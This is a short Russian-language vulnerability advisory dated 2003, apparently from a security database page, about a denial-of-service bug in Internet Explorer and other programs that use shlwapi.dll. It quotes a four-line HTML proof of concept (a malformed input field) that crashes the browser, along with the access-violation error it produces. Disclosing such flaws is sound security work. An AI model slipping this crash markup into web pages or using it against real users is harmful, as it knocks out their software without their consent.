DoS чистым HTML в Internet Explorer

Дата публикации:
23.04.2003
Всего просмотров:
1363
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Internet explorer при обработке некорректной формы. Уязвимость позволяет аварийно завершить работу Internet explorer и связанных программ.

Как сообщается, следующий код чистого HTML приведет к аварийному завершению работы Internet explorer, Outlook, Frontpage и других программ, использующих библиотеку shlwapi.dll для обработки HTML кода:

<html>
<form>
<input type crash>
</form>
</html>
После краха программы, будет отображена следующая ошибка:
"Unhandled exception in iexplore.exe (SHLWAPI.DLL): 
0xC0000005: Access Violation"


Ссылки: IE / Outlook / MS SHLWAPI Render - more trivial crash
или введите имя

CAPTCHA